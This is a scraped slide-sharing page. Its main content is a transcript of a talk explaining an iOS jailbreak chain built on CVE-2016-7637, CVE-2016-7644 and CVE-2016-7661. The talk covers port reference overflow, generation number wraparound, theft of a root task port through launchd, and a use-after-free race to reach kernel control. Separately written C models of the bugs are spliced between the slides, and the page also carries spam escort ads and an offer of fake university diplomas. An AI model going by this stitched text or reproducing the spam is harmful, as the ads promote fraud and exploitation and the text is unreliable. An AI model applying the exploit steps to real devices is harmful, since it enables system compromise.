[cb22] Mal-gopherとは?Go系マルウェアの分類のためのgimpfuzzy実装と評価 by 澤部 祐太, 甘粕 伸幸, 野村 和也
[cb22] Mal-gopherとは?Go系マルウェアの分類のためのgimpfuzzy実装と評価 by 澤部 祐太, 甘粕 伸幸, 野村 和也[cb22] Mal-gopherとは?Go系マルウェアの分類のためのgimpfuzzy実装と評価 by 澤部 祐太, 甘粕 伸幸, 野村 和也
[cb22] Mal-gopherとは?Go系マルウェアの分類のためのgimpfuzzy実装と評価 by 澤部 祐太, 甘粕 伸幸, 野村 和也
 
[cb22] Tracking the Entire Iceberg - Long-term APT Malware C2 Protocol Emulat...
[cb22] Tracking the Entire Iceberg - Long-term APT Malware C2 Protocol Emulat...[cb22] Tracking the Entire Iceberg - Long-term APT Malware C2 Protocol Emulat...
[cb22] Tracking the Entire Iceberg - Long-term APT Malware C2 Protocol Emulat...
 
[cb22] Fight Against Malware Development Life Cycle by Shusei Tomonaga and Yu...
[cb22] Fight Against Malware Development Life Cycle by Shusei Tomonaga and Yu...[cb22] Fight Against Malware Development Life Cycle by Shusei Tomonaga and Yu...
[cb22] Fight Against Malware Development Life Cycle by Shusei Tomonaga and Yu...
 

Dernier

Call Girls in Thane 9892124323, Vashi cAll girls Serivces Juhu Escorts, powai...
Call Girls in Thane 9892124323, Vashi cAll girls Serivces Juhu Escorts, powai...Call Girls in Thane 9892124323, Vashi cAll girls Serivces Juhu Escorts, powai...
Call Girls in Thane 9892124323, Vashi cAll girls Serivces Juhu Escorts, powai...Pooja Nehwal
 
(SANA) Call Girls Landewadi ( 7001035870 ) HI-Fi Pune Escorts Service
(SANA) Call Girls Landewadi ( 7001035870 ) HI-Fi Pune Escorts Service(SANA) Call Girls Landewadi ( 7001035870 ) HI-Fi Pune Escorts Service
(SANA) Call Girls Landewadi ( 7001035870 ) HI-Fi Pune Escorts Serviceranjana rawat
 
WhatsApp 9892124323 ✓Call Girls In Khar ( Mumbai ) secure service - Bandra F...
WhatsApp 9892124323 ✓Call Girls In Khar ( Mumbai ) secure service -  Bandra F...WhatsApp 9892124323 ✓Call Girls In Khar ( Mumbai ) secure service -  Bandra F...
WhatsApp 9892124323 ✓Call Girls In Khar ( Mumbai ) secure service - Bandra F...Pooja Nehwal
 
Call Girls in Nagpur Sakshi Call 7001035870 Meet With Nagpur Escorts
Call Girls in Nagpur Sakshi Call 7001035870 Meet With Nagpur EscortsCall Girls in Nagpur Sakshi Call 7001035870 Meet With Nagpur Escorts
Call Girls in Nagpur Sakshi Call 7001035870 Meet With Nagpur EscortsCall Girls in Nagpur High Profile
 
High Profile Call Girls In Andheri 7738631006 Call girls in mumbai Mumbai ...
High Profile Call Girls In Andheri 7738631006 Call girls in mumbai  Mumbai ...High Profile Call Girls In Andheri 7738631006 Call girls in mumbai  Mumbai ...
High Profile Call Girls In Andheri 7738631006 Call girls in mumbai Mumbai ...Pooja Nehwal
 
(MEGHA) Hinjewadi Call Girls Just Call 7001035870 [ Cash on Delivery ] Pune E...
(MEGHA) Hinjewadi Call Girls Just Call 7001035870 [ Cash on Delivery ] Pune E...(MEGHA) Hinjewadi Call Girls Just Call 7001035870 [ Cash on Delivery ] Pune E...
(MEGHA) Hinjewadi Call Girls Just Call 7001035870 [ Cash on Delivery ] Pune E...ranjana rawat
 
VVIP Pune Call Girls Warje (7001035870) Pune Escorts Nearby with Complete Sat...
VVIP Pune Call Girls Warje (7001035870) Pune Escorts Nearby with Complete Sat...VVIP Pune Call Girls Warje (7001035870) Pune Escorts Nearby with Complete Sat...
VVIP Pune Call Girls Warje (7001035870) Pune Escorts Nearby with Complete Sat...Call Girls in Nagpur High Profile
 
(PARI) Alandi Call Girls Just Call 7001035870 [ Cash on Delivery ] Pune Escorts
(PARI) Alandi Call Girls Just Call 7001035870 [ Cash on Delivery ] Pune Escorts(PARI) Alandi Call Girls Just Call 7001035870 [ Cash on Delivery ] Pune Escorts
(PARI) Alandi Call Girls Just Call 7001035870 [ Cash on Delivery ] Pune Escortsranjana rawat
 
Dubai Call Girls O528786472 Call Girls In Dubai Wisteria
Dubai Call Girls O528786472 Call Girls In Dubai WisteriaDubai Call Girls O528786472 Call Girls In Dubai Wisteria
Dubai Call Girls O528786472 Call Girls In Dubai WisteriaUnited Arab Emirates
 
(ANIKA) Wanwadi Call Girls Just Call 7001035870 [ Cash on Delivery ] Pune Esc...
(ANIKA) Wanwadi Call Girls Just Call 7001035870 [ Cash on Delivery ] Pune Esc...(ANIKA) Wanwadi Call Girls Just Call 7001035870 [ Cash on Delivery ] Pune Esc...
(ANIKA) Wanwadi Call Girls Just Call 7001035870 [ Cash on Delivery ] Pune Esc...ranjana rawat
 
如何办理(Adelaide毕业证)阿德莱德大学毕业证成绩单Adelaide学历认证真实可查
如何办理(Adelaide毕业证)阿德莱德大学毕业证成绩单Adelaide学历认证真实可查如何办理(Adelaide毕业证)阿德莱德大学毕业证成绩单Adelaide学历认证真实可查
如何办理(Adelaide毕业证)阿德莱德大学毕业证成绩单Adelaide学历认证真实可查awo24iot
 
FULL ENJOY - 8264348440 Call Girls in Hauz Khas | Delhi
FULL ENJOY - 8264348440 Call Girls in Hauz Khas | DelhiFULL ENJOY - 8264348440 Call Girls in Hauz Khas | Delhi
FULL ENJOY - 8264348440 Call Girls in Hauz Khas | Delhisoniya singh
 
Makarba ( Call Girls ) Ahmedabad ✔ 6297143586 ✔ Hot Model With Sexy Bhabi Rea...
Makarba ( Call Girls ) Ahmedabad ✔ 6297143586 ✔ Hot Model With Sexy Bhabi Rea...Makarba ( Call Girls ) Ahmedabad ✔ 6297143586 ✔ Hot Model With Sexy Bhabi Rea...
Makarba ( Call Girls ) Ahmedabad ✔ 6297143586 ✔ Hot Model With Sexy Bhabi Rea...Naicy mandal
 
Top Rated Pune Call Girls Ravet ⟟ 6297143586 ⟟ Call Me For Genuine Sex Servi...
Top Rated  Pune Call Girls Ravet ⟟ 6297143586 ⟟ Call Me For Genuine Sex Servi...Top Rated  Pune Call Girls Ravet ⟟ 6297143586 ⟟ Call Me For Genuine Sex Servi...
Top Rated Pune Call Girls Ravet ⟟ 6297143586 ⟟ Call Me For Genuine Sex Servi...Call Girls in Nagpur High Profile
 
9004554577, Get Adorable Call Girls service. Book call girls & escort service...
9004554577, Get Adorable Call Girls service. Book call girls & escort service...9004554577, Get Adorable Call Girls service. Book call girls & escort service...
9004554577, Get Adorable Call Girls service. Book call girls & escort service...Pooja Nehwal
 
Top Rated Pune Call Girls Katraj ⟟ 6297143586 ⟟ Call Me For Genuine Sex Serv...
Top Rated  Pune Call Girls Katraj ⟟ 6297143586 ⟟ Call Me For Genuine Sex Serv...Top Rated  Pune Call Girls Katraj ⟟ 6297143586 ⟟ Call Me For Genuine Sex Serv...
Top Rated Pune Call Girls Katraj ⟟ 6297143586 ⟟ Call Me For Genuine Sex Serv...Call Girls in Nagpur High Profile
 
Call Girls In Andheri East Call 9892124323 Book Hot And Sexy Girls,
Call Girls In Andheri East Call 9892124323 Book Hot And Sexy Girls,Call Girls In Andheri East Call 9892124323 Book Hot And Sexy Girls,
Call Girls In Andheri East Call 9892124323 Book Hot And Sexy Girls,Pooja Nehwal
 

Dernier (20)

Call Girls in Thane 9892124323, Vashi cAll girls Serivces Juhu Escorts, powai...
Call Girls in Thane 9892124323, Vashi cAll girls Serivces Juhu Escorts, powai...Call Girls in Thane 9892124323, Vashi cAll girls Serivces Juhu Escorts, powai...
Call Girls in Thane 9892124323, Vashi cAll girls Serivces Juhu Escorts, powai...
 
(SANA) Call Girls Landewadi ( 7001035870 ) HI-Fi Pune Escorts Service
(SANA) Call Girls Landewadi ( 7001035870 ) HI-Fi Pune Escorts Service(SANA) Call Girls Landewadi ( 7001035870 ) HI-Fi Pune Escorts Service
(SANA) Call Girls Landewadi ( 7001035870 ) HI-Fi Pune Escorts Service
 
🔝 9953056974🔝 Delhi Call Girls in Ajmeri Gate
🔝 9953056974🔝 Delhi Call Girls in Ajmeri Gate🔝 9953056974🔝 Delhi Call Girls in Ajmeri Gate
🔝 9953056974🔝 Delhi Call Girls in Ajmeri Gate
 
WhatsApp 9892124323 ✓Call Girls In Khar ( Mumbai ) secure service - Bandra F...
WhatsApp 9892124323 ✓Call Girls In Khar ( Mumbai ) secure service -  Bandra F...WhatsApp 9892124323 ✓Call Girls In Khar ( Mumbai ) secure service -  Bandra F...
WhatsApp 9892124323 ✓Call Girls In Khar ( Mumbai ) secure service - Bandra F...
 
Call Girls in Nagpur Sakshi Call 7001035870 Meet With Nagpur Escorts
Call Girls in Nagpur Sakshi Call 7001035870 Meet With Nagpur EscortsCall Girls in Nagpur Sakshi Call 7001035870 Meet With Nagpur Escorts
Call Girls in Nagpur Sakshi Call 7001035870 Meet With Nagpur Escorts
 
Call Girls In Vaishali 📱 9999965857 🤩 Delhi 🫦 HOT AND SEXY VVIP 🍎 SERVICE
Call Girls In Vaishali 📱  9999965857  🤩 Delhi 🫦 HOT AND SEXY VVIP 🍎 SERVICECall Girls In Vaishali 📱  9999965857  🤩 Delhi 🫦 HOT AND SEXY VVIP 🍎 SERVICE
Call Girls In Vaishali 📱 9999965857 🤩 Delhi 🫦 HOT AND SEXY VVIP 🍎 SERVICE
 
High Profile Call Girls In Andheri 7738631006 Call girls in mumbai Mumbai ...
High Profile Call Girls In Andheri 7738631006 Call girls in mumbai  Mumbai ...High Profile Call Girls In Andheri 7738631006 Call girls in mumbai  Mumbai ...
High Profile Call Girls In Andheri 7738631006 Call girls in mumbai Mumbai ...
 
(MEGHA) Hinjewadi Call Girls Just Call 7001035870 [ Cash on Delivery ] Pune E...
(MEGHA) Hinjewadi Call Girls Just Call 7001035870 [ Cash on Delivery ] Pune E...(MEGHA) Hinjewadi Call Girls Just Call 7001035870 [ Cash on Delivery ] Pune E...
(MEGHA) Hinjewadi Call Girls Just Call 7001035870 [ Cash on Delivery ] Pune E...
 
VVIP Pune Call Girls Warje (7001035870) Pune Escorts Nearby with Complete Sat...
VVIP Pune Call Girls Warje (7001035870) Pune Escorts Nearby with Complete Sat...VVIP Pune Call Girls Warje (7001035870) Pune Escorts Nearby with Complete Sat...
VVIP Pune Call Girls Warje (7001035870) Pune Escorts Nearby with Complete Sat...
 
Vip Call Girls Noida ➡️ Delhi ➡️ 9999965857 No Advance 24HRS Live
Vip Call Girls Noida ➡️ Delhi ➡️ 9999965857 No Advance 24HRS LiveVip Call Girls Noida ➡️ Delhi ➡️ 9999965857 No Advance 24HRS Live
Vip Call Girls Noida ➡️ Delhi ➡️ 9999965857 No Advance 24HRS Live
 
(PARI) Alandi Call Girls Just Call 7001035870 [ Cash on Delivery ] Pune Escorts
(PARI) Alandi Call Girls Just Call 7001035870 [ Cash on Delivery ] Pune Escorts(PARI) Alandi Call Girls Just Call 7001035870 [ Cash on Delivery ] Pune Escorts
(PARI) Alandi Call Girls Just Call 7001035870 [ Cash on Delivery ] Pune Escorts
 
Dubai Call Girls O528786472 Call Girls In Dubai Wisteria
Dubai Call Girls O528786472 Call Girls In Dubai WisteriaDubai Call Girls O528786472 Call Girls In Dubai Wisteria
Dubai Call Girls O528786472 Call Girls In Dubai Wisteria
 
(ANIKA) Wanwadi Call Girls Just Call 7001035870 [ Cash on Delivery ] Pune Esc...
(ANIKA) Wanwadi Call Girls Just Call 7001035870 [ Cash on Delivery ] Pune Esc...(ANIKA) Wanwadi Call Girls Just Call 7001035870 [ Cash on Delivery ] Pune Esc...
(ANIKA) Wanwadi Call Girls Just Call 7001035870 [ Cash on Delivery ] Pune Esc...
 
如何办理(Adelaide毕业证)阿德莱德大学毕业证成绩单Adelaide学历认证真实可查
如何办理(Adelaide毕业证)阿德莱德大学毕业证成绩单Adelaide学历认证真实可查如何办理(Adelaide毕业证)阿德莱德大学毕业证成绩单Adelaide学历认证真实可查
如何办理(Adelaide毕业证)阿德莱德大学毕业证成绩单Adelaide学历认证真实可查
 
FULL ENJOY - 8264348440 Call Girls in Hauz Khas | Delhi
FULL ENJOY - 8264348440 Call Girls in Hauz Khas | DelhiFULL ENJOY - 8264348440 Call Girls in Hauz Khas | Delhi
FULL ENJOY - 8264348440 Call Girls in Hauz Khas | Delhi
 
Makarba ( Call Girls ) Ahmedabad ✔ 6297143586 ✔ Hot Model With Sexy Bhabi Rea...
Makarba ( Call Girls ) Ahmedabad ✔ 6297143586 ✔ Hot Model With Sexy Bhabi Rea...Makarba ( Call Girls ) Ahmedabad ✔ 6297143586 ✔ Hot Model With Sexy Bhabi Rea...
Makarba ( Call Girls ) Ahmedabad ✔ 6297143586 ✔ Hot Model With Sexy Bhabi Rea...
 
Top Rated Pune Call Girls Ravet ⟟ 6297143586 ⟟ Call Me For Genuine Sex Servi...
Top Rated  Pune Call Girls Ravet ⟟ 6297143586 ⟟ Call Me For Genuine Sex Servi...Top Rated  Pune Call Girls Ravet ⟟ 6297143586 ⟟ Call Me For Genuine Sex Servi...
Top Rated Pune Call Girls Ravet ⟟ 6297143586 ⟟ Call Me For Genuine Sex Servi...
 
9004554577, Get Adorable Call Girls service. Book call girls & escort service...
9004554577, Get Adorable Call Girls service. Book call girls & escort service...9004554577, Get Adorable Call Girls service. Book call girls & escort service...
9004554577, Get Adorable Call Girls service. Book call girls & escort service...
 
Top Rated Pune Call Girls Katraj ⟟ 6297143586 ⟟ Call Me For Genuine Sex Serv...
Top Rated  Pune Call Girls Katraj ⟟ 6297143586 ⟟ Call Me For Genuine Sex Serv...Top Rated  Pune Call Girls Katraj ⟟ 6297143586 ⟟ Call Me For Genuine Sex Serv...
Top Rated Pune Call Girls Katraj ⟟ 6297143586 ⟟ Call Me For Genuine Sex Serv...
 
Call Girls In Andheri East Call 9892124323 Book Hot And Sexy Girls,
Call Girls In Andheri East Call 9892124323 Book Hot And Sexy Girls,Call Girls In Andheri East Call 9892124323 Book Hot And Sexy Girls,
Call Girls In Andheri East Call 9892124323 Book Hot And Sexy Girls,
 

Stunning Guards for iOS Jailbreak

  • 1. Take a Jailbreak - Stunning Guards for iOS Jailbreak - Kaoru Otsuka
  • 2. Who am I
    • An iOS hacking enthusiast
    • A first-grade high school student at Waseda University High School
  • 3. Summary
    • This talk explains the following 3 methods:
    • Escalation to root
    • Escalation to kernel
    • Disabling mitigations for post-exploitation
  • 4. The bugs
    • These bugs were found by Ian Beer of Google Project Zero
    • CVE-2016-7637 - Broken kernel mach port name uref handling on iOS/MacOS can lead to privileged port name replacement in other processes
    • CVE-2016-7644 - XNU kernel UaF due to lack of locking in set_dp_control_port
    • CVE-2016-7661 - MacOS/iOS arbitrary port replacement in powerd
  • 5. Attack vector
    • CVE-2016-7637 and CVE-2016-7661 for privilege escalation to root
    • CVE-2016-7644 to gain the kernel task port
    • Applying patches to disable a bunch of mitigations
  • 6. CVE-2016-7637
    • This vulnerability can be used for a MITM attack and leads us to gain a root task port.
  • 7. CVE-2016-7637
    • The bug is basically a mistake in a buffer-overflow check (but it is not a buffer overflow bug in ipc_right_copyout)
  • 8. CVE-2016-7637
    • What’s the meaning of “pegging”?
    • Presumably it is there to prevent a sort of buffer overflow and wrap-around to 0
    • But the concept of “pegging” is hardly used in xnu
    • Can we exploit it?
  • 9. Mach IPC system
    • The ports targeted by this exploit are related to ipc_entry
    • Source: “Through the mach portal”, ianbeer, https://bugs.chromium.org/p/project-zero/issues/attachment?aid=280146
  • 10. CVE-2016-7637
    • The point is that the UREFS count is capped at 0xFFFE, and an “overflow” message is sent to the target port
    • The next UREFS count, which is supposed to be 0xFFFF, instead stays at 0xFFFE
    • So it turns into an out-of-sync vulnerability
    • Let’s take a look at the inside of this exploit in the next slide
  • 11. CVE-2016-7637
    • The applied technique is sending 0x10000 messages (carrying the same send right) to the target port
    • The messages are made so that they get freed inside mach_msg_server (by sending invalid messages)
    • Spray those malicious messages at the target port’s UREFS; they are freed after they have been counted in UREFS
    • This causes the target port to be freed!
    • Let’s reallocate there and take control of the target port
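The slides above describe a per-name reference count that "pegs" at 0xFFFE and then falls out of sync with the references actually handed out. The following is an added illustration, not the talk's code and not XNU's: a minimal model of such a counter with two policies, the naive one (stop counting at the cap but keep honouring decrements) and a sticky one (once saturated, never decrement, so the entry leaks instead of being freed). The cap value is taken from the slides; the struct, function names and the two policies are my own.

```c
#include <stdint.h>
#include <stdbool.h>
#include <stdio.h>

/* Cap stated on the slides; assumed here to be the value the count pegs at. */
#define UREFS_PEG 0xFFFEu

typedef struct {
    uint32_t kernel_urefs;  /* what the kernel's entry records for this name */
    uint32_t real_refs;     /* how many user references were actually handed out */
    bool     pegged;        /* sticky policy only: remember that we saturated */
    bool     freed;         /* set when kernel_urefs hits 0 and the entry is released */
} uref_entry;

/* Hand out one more user reference (e.g. one message carrying the send right). */
static void uref_add(uref_entry *e, bool sticky_peg)
{
    e->real_refs++;
    if (e->kernel_urefs >= UREFS_PEG) {
        /* Saturate. The naive policy just stops counting; the sticky policy
         * also records that the true count is now unknowable. */
        if (sticky_peg)
            e->pegged = true;
        return;
    }
    e->kernel_urefs++;
}

/* Consume one user reference (e.g. mach_port_deallocate on the name). */
static void uref_drop(uref_entry *e)
{
    if (e->real_refs > 0)
        e->real_refs--;
    if (e->pegged)
        return;                 /* sticky peg: never decrement a saturated count */
    if (e->kernel_urefs > 0)
        e->kernel_urefs--;
    if (e->kernel_urefs == 0)
        e->freed = true;        /* entry released, whatever real_refs says */
}

/* Hand out n_add references, then drop n_drop of them. */
static uref_entry simulate(uint32_t n_add, uint32_t n_drop, bool sticky_peg)
{
    uref_entry e = {0, 0, false, false};
    for (uint32_t i = 0; i < n_add; i++)
        uref_add(&e, sticky_peg);
    for (uint32_t i = 0; i < n_drop; i++)
        uref_drop(&e);
    return e;
}

/* True if the entry was freed while real references were still outstanding:
 * the out-of-sync condition the slides describe. */
static bool premature_free(uint32_t n_add, uint32_t n_drop, bool sticky_peg)
{
    uref_entry e = simulate(n_add, n_drop, sticky_peg);
    return e.freed && e.real_refs > 0;
}

/* The count the kernel's entry records after the scenario. */
static uint32_t recorded_urefs(uint32_t n_add, uint32_t n_drop, bool sticky_peg)
{
    return simulate(n_add, n_drop, sticky_peg).kernel_urefs;
}

int main(void)
{
    /* The slides' scenario: 0x10000 references handed out, 0xFFFE dropped. */
    uref_entry naive  = simulate(0x10000, 0xFFFE, false);
    uref_entry sticky = simulate(0x10000, 0xFFFE, true);
    printf("naive peg : kernel=%u real=%u freed=%d\n",
           (unsigned)naive.kernel_urefs, (unsigned)naive.real_refs, naive.freed);
    printf("sticky peg: kernel=%u real=%u freed=%d\n",
           (unsigned)sticky.kernel_urefs, (unsigned)sticky.real_refs, sticky.freed);
    return 0;
}
```

With the naive policy the recorded count reaches 0 and the entry is freed while two real references are still alive; with the sticky policy the count stays pinned at the cap and the entry is never freed. Leaking a saturated object is the standard safe answer for a counter that can no longer be trusted (Linux's refcount_t saturates the same way).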
  • 12. CVE-2016-7637
    • There is a mitigation against reallocating a port and using it (Use-After-Free style)
    • “ipc_entry” has a generation number field (in “ie_bits”)
    • The generation number is a 6-bit bit field
    • The generation number is checked at the userspace/kernelspace boundary
    • The generation number increment code is shown on the slide
  • 13. CVE-2016-7637
    • The generation number has 64 values (no overlap within that range)
    • So we need a primitive that lets us loop the generation number around so that it matches at the 64th reallocation
    • To exploit this reliably, the target port needs to sit approximately in the middle of the freelist
  • 14. ipc_entry freelist
    • It’s a simple LIFO list
    • Though the value indicating the next node isn’t an address but an index into “is_table”
    • When the entry is unlinked from the freelist, the old head becomes our next node
  • 15. CVE-2016-7637
    • This part is about improving the reliability of the exploit
    • Send N messages (reallocated and soon freed) so that the target port moves down the freelist
    • After that, send 62 loops of 2N messages to increment the target port’s generation number
  • 16. CVE-2016-7637
    • Review of this exploit:
    • Carry out the UREFS bug
    • Send N messages
    • Send 62 loops of 2N messages
    • The target port’s generation number will have been matched
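Slides 12 to 14 describe two properties of the entry table: an index-linked LIFO freelist and a 6-bit generation number that is checked when a name crosses the user/kernel boundary. The model below is an added example (not the talk's code, not XNU's) that shows both: a stale name is rejected after the slot has been reused once, and is accepted again once the generation has wrapped, which is exactly why a 64-value generation is a probabilistic guard rather than an absolute one. The field layout (generation in the top byte of ie_bits, index and generation byte packed into the name) follows my reading of the XNU headers and should be treated as an assumption; the table size and function names are mine.

```c
#include <stdint.h>
#include <stdbool.h>
#include <stddef.h>

#define TABLE_SIZE 8

/* Assumed layout: the generation is a 6-bit field in the top byte of ie_bits,
 * stepped by IE_BITS_GEN_ONE, so it wraps after 64 steps. */
#define IE_BITS_GEN_MASK 0xFF000000u
#define IE_BITS_GEN_ONE  0x04000000u
#define IE_BITS_GEN(b)   ((b) & IE_BITS_GEN_MASK)

/* A port name packs the table index and the generation byte. */
typedef uint32_t mach_port_name_t;
#define MACH_PORT_INDEX(n)        ((n) >> 8)
#define MACH_PORT_GEN(n)          (((n) & 0xFFu) << 24)
#define MACH_PORT_MAKE(idx, gen)  (((uint32_t)(idx) << 8) | ((gen) >> 24))

typedef struct {
    uint32_t ie_bits;   /* generation in the top byte */
    uint32_t ie_next;   /* freelist link: an index into the table, not a pointer */
    void    *ie_object; /* the port this name refers to */
    bool     in_use;
} ipc_entry;

typedef struct {
    ipc_entry table[TABLE_SIZE];
    uint32_t  free_head;  /* index of the first free entry; 0 means empty */
} ipc_space;

/* Entry 0 is reserved (the null name); thread 1..N-1 onto the freelist. */
static void space_init(ipc_space *s)
{
    for (uint32_t i = 1; i < TABLE_SIZE; i++) {
        ipc_entry e = { 0, (i + 1 < TABLE_SIZE) ? i + 1 : 0, NULL, false };
        s->table[i] = e;
    }
    s->free_head = 1;
}

/* Allocate a name: pop the freelist head, step its generation, build the name. */
static mach_port_name_t entry_alloc(ipc_space *s, void *obj)
{
    uint32_t idx = s->free_head;
    if (idx == 0)
        return 0;
    ipc_entry *e = &s->table[idx];
    s->free_head = e->ie_next;                 /* the old head's link is the new head */
    e->ie_bits   = IE_BITS_GEN(e->ie_bits + IE_BITS_GEN_ONE);
    e->ie_object = obj;
    e->in_use    = true;
    return MACH_PORT_MAKE(idx, IE_BITS_GEN(e->ie_bits));
}

/* Lookup at the user/kernel boundary: both index and generation must match. */
static void *entry_lookup(const ipc_space *s, mach_port_name_t name)
{
    uint32_t idx = MACH_PORT_INDEX(name);
    if (idx == 0 || idx >= TABLE_SIZE || !s->table[idx].in_use)
        return NULL;
    if (IE_BITS_GEN(s->table[idx].ie_bits) != MACH_PORT_GEN(name))
        return NULL;                           /* stale name: the slot was reused */
    return s->table[idx].ie_object;
}

/* Free a name: push the entry back as the new freelist head (LIFO). */
static bool entry_free(ipc_space *s, mach_port_name_t name)
{
    if (entry_lookup(s, name) == NULL)
        return false;
    ipc_entry *e = &s->table[MACH_PORT_INDEX(name)];
    e->in_use    = false;
    e->ie_object = NULL;
    e->ie_next   = s->free_head;
    s->free_head = MACH_PORT_INDEX(name);
    return true;
}

/* Allocate two names, free both, allocate again: LIFO hands back the last freed slot. */
static bool freelist_is_lifo(void)
{
    static int obj;
    ipc_space s;
    space_init(&s);
    mach_port_name_t a = entry_alloc(&s, &obj);
    mach_port_name_t b = entry_alloc(&s, &obj);
    entry_free(&s, a);
    entry_free(&s, b);
    return MACH_PORT_INDEX(entry_alloc(&s, &obj)) == MACH_PORT_INDEX(b);
}

/* Free a name, then reuse its slot up to max_reuses times. Returns the reuse
 * count at which the old (stale) name resolves to the new object again, or 0
 * if it never does within the limit. */
static unsigned reuses_until_stale_name_revives(unsigned max_reuses)
{
    static int old_obj, new_obj;
    ipc_space s;
    space_init(&s);
    mach_port_name_t stale = entry_alloc(&s, &old_obj);
    entry_free(&s, stale);
    for (unsigned i = 1; i <= max_reuses; i++) {
        mach_port_name_t fresh = entry_alloc(&s, &new_obj);  /* same slot comes back */
        if (entry_lookup(&s, stale) == &new_obj)
            return i;
        entry_free(&s, fresh);
    }
    return 0;
}
```

After one reuse the stale name fails the generation check; after 63 it still fails; on the 64th reuse the generation byte has come full circle and the stale name resolves to the new object, matching the "64th reallocation" figure on slide 13.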
  • 17. What’s suitable for the target port?
    • We need a send right for that port
    • The kernel ports can’t be consumed, since kernel-owned ports are looked up each time (e.g. a bad generation number setting)
    • launchd is a great service
  • 18. launchd
    • com.apple.iohideventsystem can be accessed from inside the sandbox, and we are allowed to hold a send right to it
    • Thanks to Apple’s insecurity, com.apple.iohideventsystem receives the task port from its client
    • Man-in-the-middling the target port to capture the task port gives us a root task port
  • 19. Task port
    • A task port is assigned per task
    • A task port can be obtained by task_for_pid, though this API is very restricted
    • If we have the task port, we can do anything in its process.
  • 20. CVE-2016-7661
    • powerd is a client of com.apple.iohideventsystem
    • powerd runs as root
    • Crashing the powerd process (CVE-2016-7661) causes the target port to receive powerd’s task port
  • 21. CVE-2016-7644
    • This vulnerability leads us to gain the kernel task port
  • 22. ipc_port
    • ipc_entry has a reference to ipc_port (ie_object)
    • ipc_entry holds only a reference to the ipc_port object
    • ipc_port objects are maintained in zones allocated by the zone allocator
  • 23. CVE-2016-7644
    • This vulnerability is a sort of Use-After-Free
    • set_dp_control_port can only be called with a root task port, so we can’t use this bug without the previous exploit
  • 24. CVE-2016-7644
    • Threads can race to see the same value for dynamic_pager_control_port and release it
    • ipc_port_release_send decrements the reference count io_references
  • 25. How do we know when the reference count io_references hits 0?
  • 26. CVE-2016-7644
    • MIG has a feature named the no-more-senders notification, which notifies us when there are no ip_srights left after ipc_port_release_send
    • The total count of senders, ip_srights, is decremented as well as the reference count
    • So we take advantage of that to notice when it reaches 0
  • 27. no-more-senders
    • ipc_port_release_send drops one reference and one send right for that port
    • ipc_notify_no_senders sends the notification to port->nsrequest when the port has no more senders
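Slides 24 to 27 describe two things: how ipc_port_release_send drops one send right and one reference (firing no-more-senders when the send-right count hits 0), and how two threads that both read the same global port value can each release it. The model below is an added example, not the talk's code and not XNU's: a toy ipc_port with the two counters, the racy "read, then clear and release" pattern on a global slot, and the safe pattern that swaps the slot under a lock and releases exactly once. The model is single-threaded, so the two racing callers are simulated by having both read the slot before either clears it; the lock is a placeholder flag that marks where the real lock would go.

```c
#include <stdint.h>
#include <stdbool.h>
#include <stddef.h>

typedef struct {
    uint32_t io_references;   /* object references held on the port */
    uint32_t ip_srights;      /* outstanding send rights */
    bool     no_senders_sent; /* notification delivered to the nsrequest holder */
    bool     freed;           /* last reference dropped: object destroyed */
} ipc_port;

/* Deliver the no-more-senders notification (to port->nsrequest in real XNU). */
static void ipc_notify_no_senders(ipc_port *p) { p->no_senders_sent = true; }

/* Drop one send right and one reference, as slide 27 describes.
 * Returns false and does nothing on a NULL port or on underflow. */
static bool ipc_port_release_send(ipc_port *p)
{
    if (p == NULL || p->ip_srights == 0 || p->io_references == 0)
        return false;
    if (--p->ip_srights == 0)
        ipc_notify_no_senders(p);
    if (--p->io_references == 0)
        p->freed = true;
    return true;
}

/* A global slot holding one send right, like dynamic_pager_control_port. */
typedef struct {
    ipc_port *port;
    bool      locked;   /* placeholder for the real lock; the model is single-threaded */
} control_slot;

static void slot_lock(control_slot *s)   { s->locked = true; }
static void slot_unlock(control_slot *s) { s->locked = false; }

/* Racy pattern: the caller read s->port earlier, without the lock, into `seen`
 * and now clears the slot and releases what it saw. Two callers that both read
 * the same value before either cleared it release the same right twice. */
static bool slot_clear_racy(control_slot *s, ipc_port *seen)
{
    s->port = NULL;
    return ipc_port_release_send(seen);
}

/* Safe pattern: swap the slot to NULL under the lock and release the old value
 * exactly once, outside the lock. A second caller finds NULL and releases nothing. */
static bool slot_clear_safe(control_slot *s)
{
    slot_lock(s);
    ipc_port *old = s->port;
    s->port = NULL;
    slot_unlock(s);
    return ipc_port_release_send(old);
}

/* Scenario: the slot and one other holder each have a send right (2 rights,
 * 2 references). Two callers race on the racy clear. Returns true if the port
 * was destroyed although the other holder's right is still outstanding. */
static bool racy_clear_frees_port_still_in_use(void)
{
    ipc_port p = { 2, 2, false, false };
    control_slot s = { &p, false };
    ipc_port *seen_by_first  = s.port;   /* both read before either clears */
    ipc_port *seen_by_second = s.port;
    slot_clear_racy(&s, seen_by_first);
    slot_clear_racy(&s, seen_by_second);
    return p.freed && p.no_senders_sent;
}

/* Same scenario with the safe clear: one release, the other holder keeps a
 * live port, and no spurious no-more-senders notification fires. */
static bool safe_clear_keeps_port_alive(void)
{
    ipc_port p = { 2, 2, false, false };
    control_slot s = { &p, false };
    bool first  = slot_clear_safe(&s);
    bool second = slot_clear_safe(&s);
    return first && !second && !p.freed && !p.no_senders_sent
           && p.io_references == 1 && p.ip_srights == 1;
}
```

The racy sequence delivers no-more-senders and frees the port while another holder still owns a send right, which is the dangling ie_object the later slides draw; the swap-under-lock sequence makes the second caller a no-op. The design rule is the general one: take ownership of a shared pointer atomically, then release it outside the critical section.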
  • 29. (diagram: ipc_entries table, portA’s ie_object, portB) Making a reference for that port: 2 references, 1 send right. portB has a send right to portA, though it doesn’t receive from portA
  • 30. (diagram: portA, portB, portC) 3 references, 2 send rights. portC will be the receiver of the no-more-senders notification
  • 34. (diagram: portA, portB, portC) 1 reference, 0 send rights; no-more-senders is sent to portC. We could get the notification, so we won the race!
  • 35. (diagram: portA, portB, portC) 1 reference, 0 send rights. Then, what will happen if portB is destroyed?
  • 36. (diagram: portA, portC; portB gone) 0 references, 0 send rights. Then, what will happen if portB is destroyed?
  • 37. (diagram: ipc_entries table, ie_object) 0 references, 0 send rights. What is ie_object pointing to? The ipc_entry->ie_object becomes a dangling pointer!
  • 38. zalloc
    • zalloc is a system call that assigns zones corresponding to the size
    • zalloc has a local freelist per zone
    • zones are freed under memory pressure or by mach_force_zone_gc
  • 39. CVE-2016-7644
    • There are zones for ipc_port, as I said before
    • We allocate ram_mb*20 ports (early ports)
    • And we allocate 20 ports (middle ports)
    • Finally, we allocate 5000 ports (late ports)
